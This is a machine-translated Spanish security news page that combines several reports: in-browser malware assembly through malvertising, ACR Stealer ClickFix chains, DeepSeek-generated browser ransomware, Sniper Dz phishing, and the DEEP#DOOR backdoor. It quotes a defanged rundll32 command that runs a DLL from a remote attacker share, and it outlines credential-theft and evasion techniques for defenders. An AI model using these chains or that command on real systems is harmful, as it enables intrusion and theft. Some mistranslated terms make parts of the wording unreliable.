La publicidad maliciosa envía malware en pedazos y luego hace que el navegador cree el ejecutable – CYBERDEFENSA.MX

Una operación de publicidad maliciosa denominada Comercio amargo está haciendo que los navegadores de las víctimas creen ellos mismos el ejecutable final de Windows, utilizando un tiempo de ejecución legítimo de Bun como base en lugar de servir un archivo malicioso completo desde una URL fija.

Confiante, que detalló la campaña el 23 de julio de 2026, dijo que ha operado desde finales de 2024 y se hizo pasar por TradingView, Solana y Luno para dirigirse a comerciantes minoristas e inversores en criptomonedas en 12 países en 25 idiomas.

Sus páginas de destino toman las huellas dactilares de los visitantes, mostrando a los investigadores y robots sospechosos una página vacía, mientras que los objetivos seleccionados reciben una copia convincente del servicio suplantado. La defensa contra esto es la ordinaria: instalar software comercial y de billetera desde el sitio del propio proveedor, no desde un anuncio.

La cadena documentada no se basa en una vulnerabilidad del navegador ni elimina la Marca de la Web (MotW). El análisis de Confiant documenta la entrega, no la ejecución, del archivo dentro del navegador, y no establece si la descarga final comienza automáticamente o requiere un clic.

La página de destino comienza a preparar la ruta de entrega sin esperar un clic de descarga. Registra un ServiceWorker con ámbito de página en /sw.jsluego crea un SharedWorker a partir de JavaScript ya incrustado en la página, por lo que la fuente del trabajador nunca aparece como una recuperación separada.

Las solicitudes de SharedWorker /configque devuelve una plantilla, una URL de ejecución secundaria y valores aleatorios específicos de la sesión. El navegador recupera y descomprime un tiempo de ejecución de Bun limpio de ese segundo dominio, purelogicbox.[.]org en la respuesta de muestra publicada.

Ciberseguridad

Los blobs Base64 en la configuración proporcionan el encabezado del ejecutable portátil (PE), la tabla de secciones y un .bun sección que contiene código de bytes JavaScriptCore malicioso para app.js. Bun se ejecuta en el motor JavaScriptCore de Apple y es compatible legítimamente compilar aplicaciones y código de bytes en ejecutables independientes de Windows.

Luego, el trabajador genera un gran flujo de bytes pseudoaleatorios utilizando AES en modo contador (AES-CTR). Luego sigue la plantilla proporcionada como una receta de copia de bytes, combinando rangos seleccionados del tiempo de ejecución de Bun, el flujo generado y el material ejecutable controlado por el atacante.

Cada víctima puede recibir un archivo ensamblado diferente: rotando la semilla y el tamaño en cada uno /config La respuesta cambia el hash manteniendo el código de carga útil ejecutable. «Nunca existe ningún malware terminado en la red», escribió Michael Steele del equipo de inteligencia de amenazas de Confiant. Ningún binario completo lo hace, aunque las estructuras PE y el código de bytes llegan como Base64 en /config.

Una vez ensamblada, la página pasa el ejecutable al ServiceWorker como una secuencia legible. Un iframe oculto navega a una URL del mismo origen y el trabajador devuelve los bytes generados con un Content-Disposition encabezado del archivo adjunto. El registro MotW resultante identifica la página de destino como la fuente de descarga, no el dominio separado que proporcionó el tiempo de ejecución de Bun. El propio MotW sigue presente.

El método evolucionó a partir de la actividad que Confiant rastreó hasta el 30 de abril de 2026, cuando se cargaron las páginas. StreamSaver.jsuna biblioteca de descarga continua de código abierto, desde la dirección de GitHub Pages de su autor. Eso dejó la ruta de descarga registrada apuntando a la URL de GitHub de la biblioteca. Las páginas actuales mantienen su arquitectura de streaming, incluyendo la streamsaver: nombres de mensajes, pero ya no los recupera de GitHub.

Bitdefender documentado el clúster de publicidad maliciosa TradingView relacionado en septiembre de 2025, identificando su carga útil final como el ladrón que Check Point rastrea como JSCEAL y con Secure como GorgojoProxy.

Ciberseguridad

Confiant identifica la campaña compartida y las características ejecutables, pero no demuestra que las tres muestras publicadas lleven esa carga útil. El informe también dice que Bitdefender encontró un ejecutable Bun modificado en este clúster.

Hacker News no encontró ninguna mención de Bun en los enlaces de Confiant de la publicación de septiembre de 2025, que nombra su detección de cargador Variant.DenoSnoop.Marte.1. Por lo tanto, el robo de credenciales, el registro de teclas, la interceptación de tráfico, el robo de billeteras y las capacidades de acceso remoto documentadas en la campaña anterior aún no se pueden asignar a los archivos actuales.

The Hacker News se comunicó con Confiant para solicitar aclaraciones sobre su referencia a los hallazgos anteriores de Bitdefender y actualizará esta historia con cualquier respuesta.

No es necesario aplicar ningún parche de software. La evasión es más estrecha de lo que parece a primera vista. La propia sección de implicaciones prácticas de Confiant lo expresa de manera más modesta: las compilaciones únicas por sesión limitan el valor de las detecciones simples basadas en hash. El material PE y el código de bytes controlados por el atacante aún cruzan la red.

Los defensores deben examinar toda la cadena, desde la referencia del anuncio y la página de destino encubierta hasta la /config solicitud, la recuperación del tiempo de ejecución del dominio secundario y la descarga de ServiceWorker, en lugar de tratar cualquier artefacto de red o archivo como decisivo.

Confiant publicó tres hashes SHA-256 y una lista de dominios maliciosos, 96 según el recuento de The Hacker News. La empresa no nombró a ningún actor y detuvo su análisis en el momento en que el archivo llega al disco.

ACR Stealer utiliza señuelos ClickFix para robar tokens del navegador y archivos de Microsoft 365 – CYBERDEFENSA.MX

ACR Stealer, un ladrón de información en circulación desde 2024, está saliendo de las redes empresariales con contraseñas de navegador guardadas, tokens de sesión en vivo, archivos PDF, documentos de Microsoft 365 y archivos de carpetas sincronizadas de OneDrive y SharePoint.

Entra porque alguien pegó un comando en un cuadro Ejecutar y presionó Enter. microsoft establecido dos de las cadenas de entrega el jueves. Su equipo Defender Experts, el brazo de detección administrado de la compañía, había observado el aumento de la actividad de ACR Stealer en los entornos de los clientes desde finales de abril hasta mediados de junio, y dice que las campañas están «utilizando con éxito señuelos ClickFix para robar credenciales de navegador, tokens de autenticación y documentos confidenciales».

Ambas cadenas se abren con el mismo mensaje y luego se dividen: una deja rastros en el disco, la otra se ejecuta casi por completo en la memoria. La guía de remediación de Microsoft les dice a las víctimas que revoquen los tokens, no solo que roten las contraseñas.

Una carga útil en los píxeles

El mensaje probablemente llegue a través de publicidad maliciosa o resultados de búsqueda manipulados por SEO, según el informe. La cadena sin archivos comienza cuando se genera el comando pegado mshta.exe para extraer contenido HTA remoto. Un cargador de VBScript integrado se apoya en objetos COM para decodificar y activar PowerShell; esa etapa genera una identificación de víctima, deshabilita la validación de certificados y ejecuta lo que recupera en la memoria.

Lo que recupera es un JPEG de un servidor de imágenes, con la carga útil en los píxeles. Las rutinas personalizadas lo crean, lo descifran, lo descomprimen y lo ejecutan de manera reflexiva. Luego va por Chrome y Edge, leyendo el Login Data y Web Data bases de datos e invocar DPAPI para descifrar las contraseñas, cookies y tokens que contienen. Los archivos PDF en el escritorio y en Descargas también van.

El 26 de mayo, Brad Duncan, responsable del SANS Internet Storm Center documentó una infección de Windows rastreó hasta una página que se hacía pasar por Claude, el asistente de inteligencia artificial de Anthropic, a la que se accedía a través de anuncios maliciosos de Google y que a menudo se escondía detrás sites.google.com URL. La página ofrecía instrucciones de macOS cuando se abría en una Mac y instrucciones de Windows cuando se abría en Windows.

Ciberseguridad

Microsoft nunca nombra el señuelo. Dos de los indicadores de su tabla de la Campaña 2, creativecommunityinfo[.]art y enhanceblabber[.]ccfiguran como host de carga útil y C2. The Hacker News comparó ambos con la cadena de Duncan, que recorría los subdominios de cada uno siete semanas antes, y el informe de Microsoft cita su diario entre las referencias.

Esa cadena también sacó un JPEG de 628 KB de ImgBB, un servicio de alojamiento de imágenes. Lo marcó como parte de la infección y no obtuvo nada: «tampoco pude encontrar ningún signo evidente de datos incrustados».

canario rojo había registrado señuelos de la marca Claude un mes antes, entregando ACR Stealer a través de páginas falsas de Claude Code en GitLab, como claude-desktop[.]gitlab[.]io.

La otra cadena deja huellas

La primera cadena de Microsoft escribe en el disco, lo que deja a los defensores más con qué trabajar. El comando pegado extrae una DLL directamente de un recurso compartido WebDAV a través de HTTPS, utilizando un directorio GUID y un nombre de archivo creado para pasar como otra cosa; el ejemplo del informe es google.ct.

Red Canary publicó la misma forma en su informe de mayo, a partir de la telemetría de abril, semanas antes del artículo de Microsoft:

"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Dos de las tres variantes que Defender Experts vio utilizar pushd Primero debe montar el recurso compartido remoto como una unidad local temporal, de modo que la carga útil se ejecute a través de lo que parece una ruta local. El más sigiloso envuelve eso en conhost.exe --headless para cerrar la ventana de la consola y oculta las cadenas para pushd, rundll32y el host remoto detrás de la expansión retrasada de las variables de entorno.

Lo que sigue es PowerShell ofuscado. Coloca un ZIP en una carpeta debajo %LocalAppData%\Temp con un nombre inofensivo; El ejemplo de Microsoft es LogiOptionsPlus. un paquete pythonw.exe luego inicia el script Python, por lo que no aparece nada en la pantalla. El instalador borra las copias más antiguas antes de realizar la instalación, lo que lo convierte en un actualizador.

Persiste a través de una tarea programada oculta que se hace pasar por una actualización de software, copia marcas de tiempo notepad.exe en sus propios archivos y borra el historial de PowerShell detrás de él. La última etapa permanece en la memoria y se ejecuta a través de la API de Windows Fiber.

En un subconjunto de estas intrusiones, un segundo cargador de Python se comunica con los puntos finales RPC públicos de blockchain y la infraestructura de nodos Web3, probablemente extrayendo una carga útil o una dirección C2 de un libro de contabilidad público. Microsoft llama a la técnica EtherHiding: coloque el puntero en un contrato inteligente y no quedará ningún solucionador controlado por el atacante que aprovechar.

Sin errores, sin números

Ninguna cadena explota una vulnerabilidad. Ambos heredan exactamente lo que el usuario que inició sesión ya tiene, y cada capa posterior, el montaje WebDAV, la extracción de píxeles y la transferencia en memoria, solo se ejecuta porque una persona leyó un mensaje y presionó Enter. No hay CVE en esta historia. La aplicación de parches no elimina la ruta de pegar y ejecutar.

Microsoft dice que los señuelos están funcionando, pero nunca lo cuantifica. El informe no proporciona un recuento de víctimas, ni un número de clientes afectados, ni una base de referencia para el aumento que informa.

La telemetría de abril de Red Canary al menos tiene números. ClearFake, un clúster de inyección web que ha estado alimentando a ACR Stealer desde al menos marzo de 2025, ocupó el puesto número uno en su lista de amenazas más frecuentes por primera vez ese mes, y ACR Stealer entró entre los diez primeros empatando en el sexto lugar.

Ciberseguridad

El clúster se entrega a través de JavaScript inyectado en sitios comprometidos y el informe de Microsoft no lo menciona en ninguna de las cadenas.

¿De quién es este ladrón?

Microsoft tiene cuidado con lo que afirma. Vincula la actividad con ACR Stealer según el comportamiento observado y el arte posterior a la explotación, se compara con lo que se sabe públicamente sobre la infraestructura de la familia y no nombra ningún actor de amenaza. La precaución se gana.

ACR, también escrito como AcridRain, fue comercializado en foros de habla rusa por un actor conocido como SheldIO, que cerró las ventas en julio de 2024. Las cuentas se dividieron sobre lo que sucedió después. eSentire dice que el código fuente se vendió. El relato de Proofpoint difiere: el mismo canal de Telegram anunció el cierre, no un adiós del equipo, y el panel de Amatera apareció cinco meses después.

En cuanto al cambio de marca, están de acuerdo. Punto de prueba reportado en junio de 2025 que «ACR Stealer fue significativamente actualizado y renombrado como Amatera Stealer», con un precio de $199 por mes a $1,499 por año. Red Canary trata a ACR y Amatera como una familia y evalúa al propio ACR como un GrMsk Stealer actualizado.

Una detección de julio de 2026 denominada ACR Stealer es una llamada de comportamiento en una base de código cuyo nombre ha cambiado al menos una vez y puede haber cambiado de propietario. La etiqueta describe el código. No te dice quién lo dirige.

donde detenerlo

Un control se encuentra antes de cada técnica anterior: ninguna cadena se ejecuta sin que un usuario pegue un comando en el cuadro de diálogo Ejecutar.

  • Corta el vector. eSentire recomienda eliminar el mensaje Ejecutar a través de GPO y bloquear mshta.exe a través de AppLocker o WDAC.
  • Utilice reglas de control de aplicaciones y reducción de la superficie de ataque para que PowerShell, Python, mshta.exey rundll32.exe no puede iniciar contenido entregado por Internet desde Downloads, Tempo %LocalAppData%.
  • Caza rundll32.exe ejecutándose sin parámetros de línea de comando mientras se establece una conexión de red, que es la oportunidad de detección de Red Canary para esta familia. Agregue tareas programadas que se hacen pasar por actualizaciones de software, tiempos de espera y borrado del historial de PowerShell.
  • En un host sospechoso, aísle, rote credenciales, revoque tokens y verifique las conexiones salientes a recursos compartidos remotos y servicios de alojamiento de imágenes.

Microsoft envió tres consultas de búsqueda de Defender XDR y 16 dominios de campaña con el informe.

Esos indicadores son una porción, y el informe así lo dice: representativos, no el rango completo de la familia, con más campañas e infraestructura probablemente activas. Los dominios rotan. La pregunta en el frente no, porque funciona. Los señuelos se superponen en lugar de reemplazarse: Red Canary vio CAPTCHA falsos y páginas de Claude falsas en la misma telemetría de abril.

El ransomware de navegador generado por IA abusa de la API de Chromium en Windows y Android – CYBERDEFENSA.MX

Los investigadores de ciberseguridad han marcado un nuevo artefacto de malware generado utilizando DeepSeek que construyó una ruta de ataque novedosa que combina «conceptos de malware de navegador poco realistas con una capacidad real del navegador» para convertirlo en una técnica de ransomware funcional que se ejecuta completamente dentro del navegador en dispositivos Windows y Android.

«Este es el primer caso documentado en el que un modelo de inteligencia artificial de frontera cerró de forma independiente la brecha entre un riesgo teórico de ransomware exclusivo del navegador y una cadena de ataque práctica y funcional, lo que reveló una ruta de ataque novedosa que los defensores habían descartado anteriormente como inviable debido a los límites del espacio aislado del navegador», dijo Check Point en un comunicado compartido con The Hacker News.

«La experiencia necesaria para descubrir una nueva ruta de ataque ya no es el cuello de botella, y los defensores deben tener en cuenta ese cambio ahora, antes de que los actores de amenazas lo pongan en práctica a escala».

La muestra identificada es una aplicación Python Flask llamada «deepseek_python_20260125_da0631.py» que se subió a VirusTotal el 25 de enero de 2026, y el servicio de escaneo de malware propiedad de Google lo describió como un «kit de herramientas de ransomware y ladrón de información completamente funcional». InfernoGrabber v9.0 del autor del malware.

Ciberseguridad

La aplicación está diseñada para funcionar como un servidor web malicioso que atrae a las víctimas con un escalador de IA de avatar de Discord falso, mientras ejecuta sigilosamente una amplia gama de acciones dañinas, incluido el robo de tokens de Discord, la recopilación de números de tarjetas de crédito y frases iniciales de criptomonedas, el registro de pulsaciones de teclas y la captura de transmisiones de micrófonos y cámaras web no autorizadas.

«El código incluye rutinas específicas para la explotación del navegador (dirigidas a CVE como CVE-2023-4863), exfiltración de datos a través de un webhook de Discord codificado, una pantalla de ransomware ‘WinLocker’ que exige Bitcoin y un panel administrativo para que el atacante administre los datos robados», según VirusTotal.

Los hallazgos se producen mientras la inteligencia artificial y los grandes modelos de lenguaje (LLM) están redefiniendo el panorama de las amenazas cibernéticas, permitiendo a los actores de amenazas abusar de la tecnología para desarrollar malware y exploits. El uso de DeepSeek es digno de mención, ya que indica que los modelos de la compañía china tienen tasas de rechazo más bajas para solicitudes cibernéticas maliciosas en comparación con sus homólogos occidentales de Anthropic, Google u OpenAI.

Otros factores que pueden haber facilitado el uso de DeepSeek son su acceso gratuito a través de la interfaz web, su disponibilidad en regiones donde no operan otros modelos fronterizos y su capacidad para generar una aplicación maliciosa funcional a partir de un «único mensaje amplio» a diferencia de los modelos de Anthropic u OpenAI.

«Los modelos DeepSeek pueden convertir ideas maliciosas de alto nivel en ataques concretos y completos con menos experiencia que las plataformas de la competencia», afirmó Check Point Research.

La empresa israelí de ciberseguridad dijo que descubrió el artefacto Python como parte de su análisis de unos 3.000 archivos atribuidos a DeepSeek durante el año pasado. De ellas, 1.383 muestras han sido clasificadas como maliciosas o peligrosas. El malware Python es un ejemplo de lo que se llama In-Browser Ransomware que implementa una técnica nativa del navegador que no se encontraba en campañas del mundo real en el pasado. Se desconoce el mensaje exacto que se utilizó para producir la muestra.

La técnica de ataque implica el uso de un señuelo de phishing para engañar a un usuario para que conceda acceso al sistema de archivos de una página web, que luego enumera los archivos locales en la carpeta seleccionada, lee y filtra su contenido, los cifra y sobrescribe, y finalmente muestra una nota de extorsión a la víctima. Lo que hace que esto sea más inusual es que todo esto se puede lograr sin instalar una carga útil nativa, explotar una vulnerabilidad del navegador o requerir acceso de root.

Vale la pena mencionar aquí que el enfoque se limita a los navegadores web que exponen el selector basado en API de acceso al sistema de archivos. Esto incluye Google Chrome y otros navegadores basados ​​en Chromium en los sistemas operativos Windows y Android. No hay evidencia de que se haya abusado del patrón de ransomware nativo del navegador en la naturaleza.

Ciberseguridad

Otro aspecto preocupante del desarrollo asistido por IA es que no sólo reduce la barrera para que los malos actores generen código ofensivo, sino también el hecho de que ni siquiera necesitan saber que existe dicha API de acceso al sistema de archivos, ni tener la experiencia técnica para abusar de ella.

Dicho de otra manera, ingresar un mensaje demasiado amplio es suficiente para que un LLM (sujeto a barreras de seguridad, o a la falta de ellas) formule un plan de ataque funcional a partir de una solicitud maliciosa abstracta. Cuando un usuario con conocimientos técnicos limitados describe requisitos poco realistas, el modelo, en su búsqueda por satisfacerlos, puede generar resultados alucinantes, sacando a la luz técnicas inusuales en el proceso.

«Lo que estamos presenciando es un cambio fundamental en cómo nacen los nuevos ciberataques. Por primera vez, tenemos evidencia de que un modelo de IA puede razonar de forma independiente a través de características legítimas de la plataforma y sacar a la luz una técnica de ataque funcional sobre la cual los humanos sólo habían teorizado, sin que el atacante supiera que existía la API subyacente», dijo en un comunicado Eli Smadja, jefe de investigación de Check Point Research.

«La barrera para poner en práctica ataques complejos se está derrumbando, y eso tiene profundas implicaciones para cada organización que incorpora IA en sus flujos de trabajo, y para cada usuario móvil que ahora lleva toda su vida personal y profesional dentro de una biblioteca de fotos. El futuro de la seguridad de la IA no puede descansar en la esperanza de que los modelos rechacen la solicitud maliciosa obvia; debe asumir que la siguiente técnica de ataque será descubierta no por un investigador humano, sino por una alucinación de la IA que accidentalmente hizo algo bien».

Smadja también insta a las organizaciones a prepararse fortaleciendo la capa de entrega, reconsiderando la confianza basada en permisos y tratando cada mensaje del navegador como una decisión de seguridad.

Las estafas de Sniper Dz se dirigen a los usuarios de MENA a través de ofertas falsas de Facebook y alertas del navegador – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado detalles de actividades fraudulentas dirigidas a usuarios de todo Oriente Medio y el Norte de África mediante el empleo de varias cuentas fraudulentas de Facebook que se hacen pasar por políticos, figuras públicas y organizaciones de confianza.

«Estas cuentas promovían ofertas falsas, incluidos paquetes gratuitos de Internet móvil, compensaciones financieras y programas de subsidios gubernamentales», dijeron los analistas de Group-IB Anna Yurtaeva y Viacheslav Shevchenko. dicho.

«Se animaba a las víctimas a hacer clic en enlaces integrados para reclamar los beneficios anunciados, pero en lugar de ello eran redirigidas a través de una cadena de sitios web intermediarios que, en última instancia, conducían al phishing y a la infraestructura de monetización del tráfico».

La empresa de ciberseguridad con sede en Singapur dirige estas campañas a Sniper Dz, una plataforma llave en mano de phishing como servicio (PhaaS) que fue desmantelada el mes pasado en una operación dirigida por INTERPOL. Los hallazgos indican que la plataforma va más allá de facilitar el robo de credenciales, generando ingresos ilícitos a través del abuso de notificaciones en el navegador, suscripciones premium de SMS, llamadas con tarifas premium y estafas de inversión.

Ciberseguridad

Un «embudo típico de víctima de estafa de Sniper Dz» comienza con señuelos de ingeniería social localizados, en los que los estafadores se hacen pasar por proveedores de telecomunicaciones conocidos como Algérie Télécom para promover ofertas falsas y dirigir a los usuarios a dominios alojados en Link in bio, servicios que actúan como una capa intermediaria entre la publicación en las redes sociales y el destino final.

«En lugar de dirigir a las víctimas directamente a un sitio web malicioso, la campaña primero dirige a los usuarios a través de plataformas confiables de agregación de enlaces como Linkbio y Linktree», dijeron los investigadores de Group-IB. «Los atacantes crean páginas de destino señuelo en dominios operados por estos servicios».

El ataque finaliza dirigiendo a las víctimas a una página que obtiene permisos de notificación del navegador solicitando a los usuarios que hagan clic en «Permitir» para continuar. Detrás de escena, el código incrustado en la página web suscribe el navegador web a un sistema de notificaciones push mediante una identificación voluntaria del servidor de aplicaciones (INSÍPIDO) clave pública.

Group-IB dijo que se ha observado la misma clave VAPID en campañas que se hacen pasar por proveedores de telecomunicaciones en Argelia y estafas relacionadas con inversiones dirigidas a usuarios en múltiples regiones.

«Debido a que las claves públicas VAPID se utilizan para identificar el servicio de notificación responsable de entregar mensajes push, su reutilización puede proporcionar información valiosa sobre las relaciones de infraestructura subyacentes», dijo la compañía. «La aparición constante de la misma clave en campañas distintas sugiere que los operadores dependen de un ecosistema compartido de notificaciones push en lugar de una infraestructura independiente».

Además, la página secuestra el botón Atrás inyectando 10 estados históricos falsos, engañando a los usuarios para que visiten sitios que pueden publicar anuncios no solicitados o atrapándolos en una «prisión del botón Atrás» y dentro de contenido controlado por atacantes para inflar las impresiones de anuncios, promover estafas o entregar contenido malicioso.

Ciberseguridad

«La página también implementa una técnica de tabulación que se activa cuando los usuarios interactúan con ciertos enlaces», señaló la empresa de ciberseguridad. Si un enlace abre una nueva pestaña del navegador, un script retrasado redirige silenciosamente la pestaña original a otro destino controlado por los operadores.

«Esto permite que la campaña continúe generando tráfico a través de su infraestructura de redirección y monetización incluso después de que la víctima crea que ha abandonado el sitio. Al combinar el abuso de notificaciones del navegador con la manipulación del historial y las redirecciones con pestañas, los operadores hacen que sea mucho más difícil para los usuarios escapar del ecosistema de estafa».

Una vez que los usuarios se inscriben en la infraestructura de notificación, los ataques avanzan a la fase de monetización, dirigiendo a las víctimas a un sistema de distribución de tráfico (TDS) que determina qué estafa presentar en función de factores como el tipo de dispositivo, la ubicación y el operador de telefonía móvil. Las posibles vías incluyen estafas de llamadas con tarifas superiores, fraude de suscripciones de SMS premium y estafas de inversión.

«Esta campaña demuestra cómo las operaciones de fraude modernas dependen cada vez más del abuso de tecnologías web legítimas en lugar del malware tradicional», dijo Group-IB. «En lugar de infectar dispositivos, los operadores explotan plataformas confiables, funciones de navegador y técnicas de ingeniería social para guiar a las víctimas a través de un embudo de monetización cuidadosamente diseñado».

La nueva puerta trasera de Python utiliza el servicio de túnel para robar credenciales del navegador y de la nube – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado detalles de un marco de puerta trasera sigiloso basado en Python llamado PUERTA#PROFUNDA que viene con capacidades para establecer acceso persistente y recopilar una amplia gama de información confidencial de hosts comprometidos.

«La cadena de intrusión comienza con la ejecución de un script por lotes (‘install_obf.bat’) que desactiva los controles de seguridad de Windows, extrae dinámicamente una carga útil de Python integrada (‘svc.py’) y establece persistencia a través de múltiples mecanismos, incluidos scripts de carpetas de inicio, claves de ejecución del registro, tareas programadas y suscripciones WMI opcionales», afirman los investigadores de Securonix Akshay Gaikwad, Shikha Sangwan y Aaron Beardslee. dicho en un informe compartido con The Hacker News.

Se evalúa que el script por lotes se distribuye mediante enfoques tradicionales como el phishing. Actualmente no se sabe qué tan extendidos están los ataques que distribuyen el malware y si alguna de esas infecciones ha tenido éxito.

Ciberseguridad

Lo que hace que la cadena de ataque sea notable es que el implante central de Python está incrustado directamente dentro del script dropper, desde donde se extrae, reconstruye y ejecuta. Esto reduce la necesidad de tener que recurrir repetidamente a infraestructura externa y minimiza la huella forense.

Una vez lanzado, el malware establece comunicación con «bore[.]pub», un restaurante basado en Rust servicio de tunelizaciónlo que permite al operador emitir comandos que facilitan la ejecución remota de comandos y una vigilancia exhaustiva. Esto incluye –

  • cáscara inversa
  • Reconocimiento del sistema
  • Registro de teclas
  • Monitoreo del portapapeles
  • Captura de pantalla
  • Acceso a la cámara web
  • Grabación de audio ambiental
  • Recolección de credenciales del navegador web
  • Extracción de clave SSH
  • Credenciales almacenadas en Google Chrome, Mozilla Firefox y Windows Credential Manager
  • Robo de credenciales en la nube (Amazon Web Services, Google Cloud y Microsoft Azure)

El uso del servicio público de túnel TCP para comando y control (C2) ofrece varias ventajas, ya que elimina la necesidad de configurar una infraestructura dedicada, combina tráfico malicioso y evita incrustar detalles del servidor dentro de la carga útil.

Paralelamente, DEEP#DOOR incorpora un conjunto de mecanismos de evasión de defensa y antianálisis, como sandbox, depurador y detección de máquinas virtuales (VM), AMSI y Event Tracing para Windows (ETW) parches, desconexión de NTDLL, manipulación de Microsoft Defender, omisión de SmartScreen, supresión de registros de PowerShell, borrado de línea de comandos, marca de tiempo y borrado de registros, para pasar desapercibidos y complicar los esfuerzos de respuesta a incidentes.

Ciberseguridad

También emplea múltiples mecanismos de persistencia que implican la creación de secuencias de comandos de la carpeta de inicio de Windows, claves de ejecución del registro y tareas programadas, al mismo tiempo que depende de un mecanismo de vigilancia para garantizar que los artefactos de persistencia no se hayan eliminado y, de ser así, recrearlos automáticamente, lo que dificulta la reparación.

«El implante resultante funciona como un troyano de acceso remoto (RAT) con todas las funciones, capaz de persistencia a largo plazo, espionaje, movimiento lateral y operaciones posteriores a la explotación dentro de entornos comprometidos», dijo Securonix. «El implante prioriza la evasión de la detección y la visibilidad forense alterando directamente los mecanismos de telemetría y seguridad de Windows».

«DEEP#DOOR destaca la evolución continua de los actores de amenazas hacia marcos de intrusión sin archivos y basados ​​en scripts que dependen en gran medida de componentes nativos del sistema y lenguajes interpretados como Python. Al incorporar la carga útil directamente dentro del cuentagotas y extraerla en tiempo de ejecución, el malware reduce significativamente las dependencias externas y limita las oportunidades de detección tradicionales».

Las extensiones del navegador son el nuevo canal de consumo de IA del que nadie habla – CYBERDEFENSA.MX

Si bien gran parte del debate sobre la seguridad de la IA se centra en la protección del consumo de IA «en la sombra» y GenAI, hay una ventana abierta que nadie está protegiendo: las extensiones de navegador de IA.

A Un nuevo informe de LayerX expone cuán profundo es este punto ciego y por qué las extensiones de IA pueden ser la superficie de amenaza de IA más peligrosa en su red que no está en el radar de nadie.

Las extensiones de navegador de IA no activan su DLP y no aparecen en sus registros de SaaS. Viven dentro del propio navegador, con acceso directo a todo lo que sus empleados ven, escriben y permanecen conectados. Las extensiones de IA tienen un 60% más de probabilidades de tener una vulnerabilidad que las extensiones en promedio, tienen 3 veces más probabilidades de tener acceso a cookies, 2,5 veces más probabilidades de poder ejecutar scripts remotos en el navegador y 6 veces más probabilidades de haber aumentado sus permisos en el último año. Estas extensiones se instalan en segundos y pueden permanecer en su entorno indefinidamente.

La superficie de amenazas de la extensión del navegador es para todos, pero nadie está mirando

El primer concepto erróneo es que las extensiones son un riesgo de nicho. Algo limitado a un subconjunto de usuarios o casos extremos. Esa suposición es completamente errónea.

Según el informe, el 99% de los usuarios empresariales ejecutan al menos una extensión de navegador y más de una cuarta parte tiene más de 10 instaladas. Este no es un problema de cola larga; es universal.

Sin embargo, la mayoría de las organizaciones no pueden responder preguntas básicas. ¿Qué extensiones están en uso? ¿Quién los instaló? ¿Qué permisos tienen? ¿A qué datos pueden acceder?

Los equipos de seguridad han pasado años creando visibilidad de redes, puntos finales e identidades. Irónicamente, las extensiones del navegador siguen siendo un importante punto ciego.

Las extensiones de IA son el canal de consumo de IA del que nadie habla

Si bien gran parte de la conversación actual sobre la seguridad de la IA se centra en las plataformas SaaS y las API, este informe destaca un canal diferente y en gran medida ignorado: las extensiones de navegador de IA.

Estas herramientas se están extendiendo rápidamente. Aproximadamente 1 de cada 6 usuarios empresariales ya utiliza al menos una extensión de IA, y ese número no hace más que crecer.

Las organizaciones pueden bloquear o monitorear el acceso directo a las aplicaciones de IA. Pero las extensiones funcionan de manera diferente. Se encuentran dentro del navegador. Pueden acceder al contenido de la página, a las entradas del usuario y a los datos de la sesión sin activar los controles tradicionales.

De hecho, crean una capa no gobernada de uso de IA, que pasa por alto la visibilidad y la aplicación de políticas.

Las extensiones de IA no solo son populares. Son más riesgosos

Sería fácil suponer que las extensiones de IA conllevan un riesgo similar al de otras extensiones. Los datos muestran lo contrario.

Las extensiones de IA son significativamente más peligrosas. Tienen un 60% más de probabilidades que el promedio de tener un CVE, 3 veces más probabilidades de tener acceso a cookies, 2,5 veces más probabilidades de tener permisos de secuencias de comandos y 2 veces más probabilidades de poder manipular las pestañas del navegador.

Cada uno de estos permisos tiene implicaciones reales. El acceso a las cookies puede exponer los tokens de sesión. Los scripts permiten la extracción y manipulación de datos. El control de pestañas puede facilitar el phishing o la redirección silenciosa.

Esta combinación de adopción rápida, acceso elevado y gobernanza débil hace que las extensiones de IA sean un vector de amenaza emergente urgente.

Las extensiones no son estáticas. Cambian con el tiempo

Los equipos de seguridad suelen tratar las extensiones como estáticas. Algo que se puede aprobar una vez y olvidar. Pero no es así como funciona.

Las extensiones evolucionan. Reciben actualizaciones. Cambian de propietario. Amplian permisos.

El informe muestra que las extensiones de IA tienen casi seis veces más probabilidades de cambiar sus permisos con el tiempo, y que más del 60% de los usuarios tienen al menos una extensión de IA que cambió sus permisos durante el último año.

Esto crea un objetivo en movimiento que las listas permitidas tradicionales no pueden seguir. Una extensión que ayer era segura puede no serlo hoy.

La brecha de confianza en las extensiones del navegador es mayor de lo esperado

Los equipos de seguridad se basan en una variedad de señales de confianza para evaluar las extensiones, incluida la transparencia del editor, el recuento de instalaciones, la frecuencia de actualización y la presencia de una política de privacidad. Si bien estos no indican directamente un comportamiento malicioso, son clave para evaluar el riesgo general.

Una parte importante de las extensiones tiene bases de usuarios muy bajas. Más del 10% de todas las extensiones tienen menos de 1.000 usuarios, una cuarta parte tiene menos de 5.000 usuarios y un tercio tiene menos de 10.000 instalaciones. Esto es particularmente un desafío con las extensiones de IA, donde el 33% de las extensiones de IA tienen menos de 5.000 usuarios, y casi el 50% de las extensiones de IA tienen menos de 10.000 usuarios. Una gran base de usuarios es esencial para establecer una confianza continua, pero una vez más, las extensiones de IA están mostrando un riesgo sustancialmente mayor.

Además, alrededor del 40% de las extensiones no han recibido una actualización en más de un año, lo que sugiere que ya no se mantienen activamente. Las extensiones que no se actualizan periódicamente pueden contener vulnerabilidades no resueltas o código obsoleto que los atacantes aprovechan.

Como resultado, la mayoría de las extensiones utilizadas en entornos empresariales muestran señales débiles o faltantes en estas áreas. Esto plantea serias dudas sobre el manejo y el cumplimiento de los datos. También destaca el poco escrutinio que reciben las extensiones en comparación con otros componentes de software.

Convertir el conocimiento en acción: el camino a seguir para los CISO

El informe describe una dirección clara para los equipos de seguridad:

  1. Audite continuamente la superficie de amenazas de extensión de la organización: Dado que el 99 % de los usuarios empresariales ejecutan al menos una extensión, un inventario completo es un primer paso obligatorio hacia la reducción de riesgos. Los CISO deben realizar una auditoría de extensión en toda la organización que cubra todos los navegadores, puntos finales administrados y no administrados, en todos los usuarios.
